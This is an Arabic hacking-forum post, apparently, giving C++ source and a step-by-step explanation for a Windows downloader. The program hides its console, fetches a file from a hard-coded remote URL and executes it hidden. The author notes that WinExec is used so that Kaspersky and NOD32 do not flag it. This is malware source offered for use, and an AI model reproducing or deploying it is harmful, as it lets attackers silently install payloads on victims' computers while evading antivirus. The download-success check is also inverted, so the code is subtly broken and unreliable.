حالة الموضوع:
مغلق
  1. .:: RSS ::.

    .:: RSS ::. عضوية آلية

    الأنتساب:
    ‏9 سبتمبر 2011
    المشاركات:
    14,005
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    36
    الإقامة:
    IQ-T34M
    [FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][IMG]http://img685.imageshack.us/img685/8935/1332113925571.png[/IMG]

    [/SIZE][/FONT][/B][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][FONT=Tahoma][SIZE=2][COLOR=Blue][CENTER][B]الحمـد لله وحده نحمده ونشكره ونستعـينه ونستـغفره [/B]ونعوذ[B] بالله[/B][/CENTER]
    [CENTER][B]مـن شـرور أنـفسنا ومن سيـئات أعمالنا .. من يـهده الله فلا مضل لـه ومـن يضـلل [/B][/CENTER]
    [/COLOR][/SIZE][/FONT][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT]
    فلن تـجد له ولياً مرشدا ..
    [​IMG]
    أولا نتيجة الفحص :

    [ اللهم صلي وسلم على سيدنا محمد وعلى آله وصحبه أجمعين ]

    الكود + الشرح :

    كود:
    #include
    #include
    #include
    #include
    #include

    أظن الكود واضح : تحميل المكتبات

    احدف الفراغ بين كلمة
    S hellapi.h

    كود:
    #pragma comment (lib,"urlmon.lib")

    تحديد الليبريري التي سنحمل بها الملف من الانترنيت


    كود:
    #pragma comment (linker, "/subsystem:windows /ENTRY:mainCRTStartup")
    أخفاء شاشة الكونسول ( Console )

    كود:
    #define url "http://im24.gulfup.com/2012-07-23/1342998174611.jpg"
    تحديد اسم urlالي هو رابط الملف المباشر والي راح يكون السيرفر باي صيغة تريد

    كود:
    #define path "C:\\test.jpg"
    تحديد pathالي هو مسار تحميل الملف من الرابط

    كود:
    class Down {

    public :

    int test ()
    {
    bool what = DownL () ;

    if (what == true )
    {
    return true ;
    }

    else
    {
    return false ;
    }

    }

    private:

    bool DownL ()
    {

    HRESULT hwnd = URLDownloadToFile(NULL,url,path,0,0) ;

    if (hwnd)
    {
    return true ;
    }

    else
    {
    return false ;
    }

    }


    };
    عرفنا كلاس باسم Down ثم وضعنا فنكشن برايفيت باسم DownL وترجع قيمة صحيح او خطأ لانها من نوع Bool
    هده الفنكشن ستستعمل داخل الكلاس فقط

    ثم بعدها دالة تحميل الملف
    URLDownloadToFile حددنا هدا الاجراء بمتغيير HRESULT اسمه hwnd

    وبعدها التحقق ان كانت نجحة عملية التحميل ترجع القيمة
    true والعكس ترجع قيمة false في حالة عدم نجاح التحميل

    بعدها عرفنا فنكشن جديد باسم
    test وهو Public
    ووضعنا فيه اجراء


    كود:
    bool what = DownL () ;
    اي تعريف متغيير جديد من نوع boolean ويقبل القيمة المرجعة من فنكشن تحميل الملف الي هي Private DownL

    وبعدها التحقق ان كان تمام سيرجع قيمة True
    والعكس في حالة الفشل سترجع قيمة False


    ،
    Next ،

    كود:
    int main ()
    {
    Down test ;
    if (test.test() )
    {
    WinExec(path,SW_HIDE) ;
    }
    else
    {
    ExitProcess(0) ;
    }
    Sleep(2000) ;
    return EXIT_SUCCESS ;

    }
    الكود واضح وبسيط
    وضعنا اسم الكلاس باسم اخرى ليسهل استعماله
    Down test
    ثم التحقق من الفنكشن Public في الكلاس الدي يحمل قيمة مرجعة من فنكشن التحميل
    ام True او False


    في حالة True سيشتغل الملف المحمل من الرابط اعلاه
    استعملت WinExec لانو عند استعمال She llExecute يصير الملف ممسوك من الكاسبر والنود


    وسينام البرنامج لمدة 2 ثواني ثم يغلق عادي

    في حالة الفشل اي False
    سيغلق البرنامج

    الشكل النهائي :

    كود:
    #include
    #include
    #include
    #include
    #include

    #pragma comment(lib,"urlmon.lib")

    #pragma comment(linker, "/subsystem:windows /ENTRY:mainCRTStartup")

    #define url "http://im24.gulfup.com/2012-07-23/1342998174611.jpg"

    #define path "C:\\test.jpg"


    class Down {

    public :

    int test ()
    {
    bool what = DownL () ;

    if (what == true )
    {
    return true ;
    }

    else
    {
    return false ;
    }

    }

    private:

    bool DownL ()
    {

    HRESULT hwnd = URLDownloadToFile(NULL,url,path,0,0) ;

    if (hwnd)
    {
    return true ;
    }

    else
    {
    return false ;
    }

    }


    };

    int main ()
    {
    Down test ;
    if (test.test() )
    {
    WinExec(path,SW_HIDE) ;
    }
    else
    {
    ExitProcess(0) ;
    }
    Sleep(2000) ;
    return EXIT_SUCCESS ;

    }
    أتمنى أن يعجبكم الكود والشرح :26:

    [​IMG]
    الى هنا نكون قد انتهينا
    لقائنا في قادم المواضيع باذن الله
    في امان الله :32:

     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة